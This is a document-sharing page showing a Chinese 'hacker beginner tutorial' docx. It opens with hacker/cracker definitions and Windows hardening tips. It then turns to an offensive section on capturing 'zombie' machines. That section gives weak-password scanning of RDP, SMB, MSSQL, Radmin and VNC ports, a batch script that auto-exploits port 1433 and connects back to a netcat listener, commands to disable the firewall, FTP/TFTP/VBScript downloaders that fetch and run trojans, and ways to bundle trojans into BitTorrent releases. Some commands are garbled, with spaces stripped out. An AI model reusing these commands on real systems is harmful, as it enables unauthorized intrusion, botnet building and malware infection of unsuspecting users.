最新黑客技术入门基础教程大全.docx

上传人:b****5 文档编号:3571680 上传时间:2022-11-24 格式:DOCX 页数:52 大小:460.78KB
下载 相关 举报
最新黑客技术入门基础教程大全.docx_第1页
第1页 / 共52页
最新黑客技术入门基础教程大全.docx_第2页
第2页 / 共52页
最新黑客技术入门基础教程大全.docx_第3页
第3页 / 共52页
最新黑客技术入门基础教程大全.docx_第4页
第4页 / 共52页
最新黑客技术入门基础教程大全.docx_第5页
第5页 / 共52页
点击查看更多>>
下载资源
资源描述

最新黑客技术入门基础教程大全.docx

《最新黑客技术入门基础教程大全.docx》由会员分享,可在线阅读,更多相关《最新黑客技术入门基础教程大全.docx(52页珍藏版)》请在冰豆网上搜索。

最新黑客技术入门基础教程大全.docx

最新黑客技术入门基础教程大全

最新黑客技术入门基础教程大全

 

声明:

文章来源大多是网上收集而来,版权归其原作者所有。

1

黑客简介

"黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。

关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。

但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。

有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。

他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。

而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。

之所以要区分黑客和恶意骇客,是因为在某些情况下,我们讨论的对象是那些毫无恶意并且不会对安全防御或者用户隐私造成损害的对象,这些人只有用"黑客"这个词来描述才最贴切。

如果你只是简单的将"黑客"和"恶意的安全骇客"划等号,将无法在与人交流安全技术问题时,轻松的分辨别人所指的到底是哪种类型的人。

黑客和骇客的区别是,黑客仅仅对技术感兴趣,而后者则是通过技术获取职业发展或者谋生。

很多黑客和骇客都具有技术天赋,有些骇客据此进行职业发展。

当然,并不是每个有技术天赋的人都必须沿着黑客或者骇客的方向发展。

黑客这个术语的经典意义是指那些对于事物如何工作非常感兴趣的人,他们修理,制作或者修改事物,并以此为乐。

对于某些人来说,这个词并不准确,而对于另一些人来说,黑客意味着最终能完全掌握某些事情。

根据RFC1392的记载,互联网用户词汇将"黑客"定义为:

迷恋于获取某些系统尤其是计算机和计算机网络系统内部运作机制的人。

而这个词经常被错误的用于贬义环境。

在贬义环境中,正确的用词应该是"骇客"。

TheJargonWiki对于"黑客"的首次定义为:

迷恋于探知可编程系统细节以及如何扩展其功能的人,与大多数只需了解系统基本知识的人不同。

而安全骇客,则是以破坏安全系统为目的的人。

有些安全骇客最终会用自己所掌握的技术做善事,提供渗透测试服务,或者其他有利于安全防护的工作。

而更多的人则是利用自己的技术行恶事。

在RFC1392和JargonWiki中都对"骇客"进行了类似的贬义定义。

在不同的环境中使用正确的术语,对于沟通来说是非常重要的。

在这方面我是有过切身体验的。

一次与一家企业的负责人交流时,我们使用了相同的词汇,但是所指的对象却正好相反,结果沟通效果非常失败。

当两种不同的背景下需要同一个词汇时,比如需要谈到传统意义的黑客以及带有恶意目的的骇客时,如果不事先将术语解释清楚,或给出一定的规范,肯定会导致交流困难。

对于目前的交流来说,一个更简单的办法就是只适用恶意安全骇客,而不是黑客,这是因为:

目前大部分消息中所指的,都是带有恶意目的的骇客,而不是以技术为目标的黑客。

这就是为什么在我的文章中,总是会使用"恶意的安全骇客"来代指从事恶意活动的人,而在某些文章中如果需要涉及到传统意义的"黑客",我也会在文中再次进行说明。

在讨论安全话题时,为了能更清晰的交流,我也建议大家和我一样采用正确的词汇。

2保护自己电脑绝对不做黑客肉鸡

第一招:

屏幕保护

在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。

提示:

部分设计不完善的屏幕保护程序没有屏蔽系统的"Ctrl+Alt+Del"的组合键,因此需要设置完成之后测试一下程序是否存在这个重大Bug.不过,屏幕保护最快只能在用户离开1分钟之后自动启动,难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗?

其实我们只要打开Windows安装目录里面的system子目录,然后找到相应的屏幕保护程序(扩展名是SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的"在当前位置创建快捷方式"命令,在桌面上为这些屏幕保护程序建立一个快捷方式。

此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。

第二招:

巧妙隐藏硬盘

在"按Web页"查看方式下,进入Windows目录时都会弹出一句警告信息,告诉你这是系统文件夹如果"修改该文件夹的内容可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件",这时单击"显示文件"就可以进入该目录了。

原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。

将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击"查看"标签,选择"显示所有文件",这样就可以看见这两个文件了)。

再按"F5"键刷新一下,看看发生了什么,是不是和进入Windows目录时一样。

接下来我们用"记事本"打开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。

如果你不懂HTML语言也没关系,先找到"显示文件"将其删除,找到"修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件",将其改为自己喜欢的文字,例如"安全重地,闲杂人等请速离开"。

将"要查看该文件夹的内容,请单击"改为"否则,后果自负!

",接着向下拖动滑块到倒数第9行,找到"(file:

//%TEMPLATEDIR%\wvlogo.gif)"这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用"d:

\tupian\tupian1.jpg"替换"//"后面的内容,记住这里必须将图片的后缀名打出,否则将显示不出图片。

当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中"~"之间的内容就可以了。

*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0*usingthefile%THISDIRPATH%\folder.htt.保存并退出,按"F5"键刷新一下,是不是很有个性?

接下来要作的就是用"超级兔子"将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。

最后告诉大家一招更绝的,就是干脆将folder.htt原文件中"~"之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更安全。

第三招:

禁用"开始"菜单命令

在Windows2000/XP中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。

运行"开始→运行"命令,在"运行"对话框的"打开"栏中输入"gpedit.msc",然后单击"确定"按钮即可启动WindowsXP组策略编辑器。

在"本地计算机策略"中,逐级展开"用户配置→管理模板→任务栏和开始菜单"分支,在右侧窗口中提供了"任务栏"和"开始菜单"的有关策略。

在禁用"开始"菜单命令的时候,在右侧窗口中,提供了删除"开始"菜单中的公用程序组、"我的文档"图标、"文档"菜单、"网上邻居"图标等策略。

清理"开始"菜单的时候只要将不需要的菜单项所对应的策略启用即可,比如以删除"我的文档"图标为例,具体操作步骤为:

1)在策略列表窗口中用鼠标双击"从开始菜单中删除我的文档图标"选项。

2)在弹出窗口的"设置"标签中,选择"已启用"单选按钮,然后单击"确定"即可。

第四招:

桌面相关选项的禁用

WindowsXP的桌面就像你的办公桌一样,有时需要进行整理和清洁。

有了组策略编辑器之后,这项工作将变得易如反掌,只要在"本地计算机策略"中展开"用户配置→管理模板→桌面"分支,即可在右侧窗口中显示相应的策略选项。

1)隐藏桌面的系统图标倘若隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地达到此目的。

若要隐藏桌面上的"网上邻居"和"InternetEXPlorer"图标,只要在右侧窗口中将"隐藏桌面上网上邻居图标"和"隐藏桌面上的InternetEXPlorer图标"两个策略选项启用即可。

如果隐藏桌面上的所有图标,只要将"隐藏和禁用桌面上的所有项目"启用即可。

当启用了"删除桌面上的我的文档图标"和"删除桌面上的我的电脑图标"两个选项以后,"我的电脑"和"我的文档"图标将从你的电脑桌面上消失了。

如果在桌面上你不再喜欢"回收站"这个图标,那么也可以把它给删除,具体方法是将"从桌面删除回收站"策略项启用。

2)禁止对桌面的某些更改如果你不希望别人随意改变计算机桌面的设置,请在右侧窗口中将"退出时不保存设置"这个策略选项启用。

当你启用这个了设置以后,其他用户可以对桌面做某些更改,但有些更改,诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。

第五招:

禁止访问"控制面板"

如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开"本地计算机策略→用户配置→管理模板→控制面板"分支,然后将右侧窗口的"禁止访问控制面板"策略启用即可。

此项设置可以防止控制面板程序文件的启动,其结果是他人将无法启动控制面板或运行任何控制面板项目。

另外,这个设置将从"开始"菜单中删除控制面板,同时这个设置还从Windows资源管理器中删除控制面板文件夹。

提示:

如果你想从上下文菜单的属性项目中选择一个"控制面板"项目,会出现一个消息,说明该设置防止这个操作。

第六招:

设置用户权限

当多人共用一台计算机时,在WindowsXP中设置用户权限,可以按照以下步骤进行:

1)运行组策略编辑器程序。

2)在编辑器窗口的左侧窗口中逐级展开"计算机配置→Windows设置→安全设置→本地策略→用户权限指派"分支。

3)双击需要改变的用户权限,单击"添加用户或组"按钮,然后双击想指派给权限的用户账号,最后单击"确定"按钮退出。

第七招:

文件夹设置审核WindowsXP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件,而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。

为文件和文件夹设置审核的步骤如下:

1)在组策略窗口中,逐级展开右侧窗口中的"计算机配置→Windows设置→安全设置→本地策略"分支,然后在该分支下选择"审核策略"选项。

2)在右侧窗口中用鼠标双击"审核对象访问"选项。

3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的"属性"命令,接着在弹出的窗口中选择"安全"标签。

4)单击"高级"按钮,然后选择"审核"标签。

5)根据具体情况选择你的操作:

倘若对一个新组或用户设置审核,可以单击"添加"按钮,并且在"名称"框中键入新用户名,然后单击"确定"按钮打开"审核项目"对话框。

要查看或更改原有的组或用户审核,可以选择用户名,然后单击"查看/编辑"按钮。

要删除原有的组或用户审核,可以选择用户名,然后单击"删除"按钮即可。

6)如有必要的话,在"审核项目"对话框中的"应用到"列表中选取你希望审核的地方。

7)如果想禁止目录树中的文件和子文件夹继承这些审核项目,选择"仅对此容器内的对象和/或容器应用这些审核项"复选框。

注意:

必须是管理员组成员或在组策略中被授权有"管理审核和安全日志"权限的用户可以审核文件或文件夹。

在WindowsXP审核文件、文件夹之前,你必须启用组策略中"审核策略"的"审核对象访问"。

否则,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核。

3抓肉鸡的几种方法

找点工具就OK了端口抓肉鸡的几种方法肉鸡大家都应该清楚是什么东西吧!

呵呵这点就不用说了.............慢慢学

1、3389抓鸡

现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。

首先用端口扫描工具扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~

这种方法只针XP系统,如果遇到2000或者2003系统就不要试了

呵呵。

缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。

2、扫135端口抓肉鸡

首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。

因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。

(详细动画

可以去黑客网站搜索135)

3、扫445端口抓肉鸡

和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。

因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。

(详细动画可以去黑客网站搜索445)

4、1433端口批量溢出抓肉鸡

这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。

要用到的工具:

S扫sqlhello.exenc.exe批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件

@echooff

for/f"eol=;tokens=1,2delims="%%iin(tt.txt)dos.exetcp%%i%%j

14331000/save

@echooff

for/f"eol=;tokens=1delims="%%iin(Result.txt)dosqlhello%%i

1433xxx.xxx.xx.xx556

还要新建一个tt.txt,里面你要扫的IP段,格式为

XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中间是空格

1433是要扫描的端口,1000是扫描线程数,dosqlhello%%i

1433xxx.xxx.xx.xx556这个里的XXX添你的IP,556是后面NC监

听的端口然后再写个批处理

@echooff

Nc-l-vv-p556>daima.txt

echousername>>daima.txt

echopassword>>daima.txt

echobin>>daima.txt(以2进制传输数据)

echogetxxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt

echobye>>daima.txt

netstopsharedaccess(关闭WINDOWS自带防火墙)

ftp-s:

daima.txt

xxx.exe(也是填你木马的文件名)

deldaima.txt

注意上面的代码回车符别删掉,要不然就没法下你的马了。

几种肉鸡上传文件的方法

tftp法

先在自己某机器上建个tftp服务器,如执行tftpd32.exe,

再将文件(sample.exe)上传到别的机器中(肉鸡),

肉鸡cmd中执行:

tftp-i服务器ipgetsample.exe

ftp法

肉鸡cmd中执行:

echoopenftp服务器ip[端口]>ftp.txt

echousername>>ftp.txt

echopassword>>ftp.txt

echogetsample.exe>>ftp.txt

echobye>>ftp.txt

ftp-s:

ftp.txt

delftp.txt

工具法

利用wineggdrop的wget.exe

肉鸡cmd中执行:

wget网站/sample.exe

利用dl.vbe法

肉鸡cmd中执行:

echowithwscript:

if.arguments.count^<2then.quit:

endif

>dl.vbe

echosetaso=.createobject("adodb.stream"):

set

web=createobject("microsoft.xmlhttp")>>dl.vbe

echoweb.open"get",.arguments(0),0:

web.send:

if

web.status^>200thenquit>>dl.vbe

echo

aso.type=1:

aso.open:

aso.writeweb.responsebody:

aso.savetofile

.arguments

(1),2:

endwith>dl.vbe

cscriptdl.vbehttp:

//*。

*。

*。

*:

88/sample.exesample.exe

利用iget.vbe法

方法同4,

肉鸡cmd中执行:

echoiLocal=LCase(WScript.Arguments

(1))>iget.vbe

echoiRemote=LCase(WScript.Arguments(0))>>iget.vbe

echoSetxPost=CreateObject("Microsoft.XMLHTTP")

>>iget.vbe

echoxPost.Open"GET",iRemote,0>>iget.vbe

echoxPost.Send()>>iget.vbe

echoSetsGet=CreateObject("ADODB.Stream")>>iget.vbe

echosGet.Mode=3>>iget.vbe

echosGet.Type=1>>iget.vbe

echosGet.Open()>>iget.vbe

echosGet.Write(xPost.responseBody)>>iget.vbe

echosGet.SaveToFileiLocal,2>>iget.vbe

cscriptiget.vbehttp:

//*。

*。

*。

*/sample.exesample.exe

利用Http网站vbe法

echoSetxPost=CreateObject("Microsoft.XMLHTTP")

>dsa.vbe

echoxPost.Open"GET","http:

//*.*.*.*/sample.exe",0

>>dsa.vbe

echoxPost.Send()>>dsa.vbe

echoSetsGet=CreateObject("ADODB.Stream")>>dsa.vbe

echosGet.Mode=3>>dsa.vbe

echosGet.Type=1>>dsa.vbe

echosGet.Open()>>dsa.vbe

echosGet.Write(xPost.responseBody)>>dsa.vbe

echosGet.SaveToFile"sample.exe",2>>dsa.vbecscript

dsa.vbe

deldsa.vbe

3389法

可以开3389,然后登陆,进行本地的下载。

该方法对服务

器上传很严格的机器特有效。

(包括硬件防火墙)

先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以

去睡大觉了。

自动扫描,扫描完后自动溢出,溢出后还自动下

马执行,爽吧!

所以这里讲详细点,呵呵。

还有4221端口也

可以这样溢出,只要用这些端口的溢出工具就好了,详细动画

可以去黑客网站搜索1433。

忘了说,上面的工具和批处理什么的都要放在同一个文件

夹下。

先休息一下,打这么多字累死了

继续

5、扫1433抓肉鸡之方法2

要用到的工具:

端口扫描器X-scanSQL综合利用工具

上面我们说过了,1433溢出现在成功率已经不高了,所以我

们可以用另一种方法。

开了1433端口的机器一般都装了SQL,

所以我们可以猜测SQL弱口令来抓1433肉鸡。

首先先用端口扫描器扫一段IP的1433端口,然后结果保存为

文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描

参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了

,其他不要勾。

然后在插件设置-端口相关设置-待检测端口这

一栏,只填1433端口。

然后就可以开始扫描了。

扫描完成后会

有个报告,列出了有弱口令的机器,然后打开SQL综合利用工

具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-

利用目录,上传你的木马,然后在用DOS命令执行你的木马就

OK了。

6、用WINNTAutoAttack扫SA弱口令抓肉鸡

其实这个原理和上面一样,效率也没上面的高,只是想让大

家知道下,呵呵。

工具:

WINNTAutoAttackSQL综合利用工具

打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下

的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA

账号,接着开始扫描,扫完后,用SQL综合利用工具连上传马

执行就好了。

7、扫4899空口令抓肉鸡

工具:

端口扫描器4899探测器Radmin

首先先用端口扫描器扫一段IP的4899端口,然后用4899探测

器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有

空口令的机器,带开文件管理,上传的你木马运行就OK了。

详细动画可以去黑客网站搜索4899

8、扫5900端口抓VNC肉鸡

工具:

VNC扫描器VNC连接器

首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描

器文件名)-i219.0.0.0-219.255.255.255(扫描IP段)-p5900-

vnc-vv扫描完成后会在扫描器所在的同一文件夹生成一个文

本文件,打开后有一列IP,IP后面的有一些单词比如

patched,banned,vulnerable,只有单词为vulnerable才能连接。

接着

就用VNC连接器连接,下面就不用多说了吧?

详细动画可以去

黑客网站搜索VNC

接下来说说挂马抓肉鸡吧。

方法有很多,比如BT挂马、免费

空间挂马、迅雷挂马等等,有些我也还不会,呵呵。

下面就介

绍几种我会的。

1、BT挂马

顾名思义,就是把你的木马发布到BT网站让人下载。

当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。

所以我们需要一些隐藏的手法。

我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?

当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?

尤其是下XXX片的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。

有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?

呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。

不过这样的漏洞现在

很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。

在这里就

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 人文社科 > 设计艺术

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1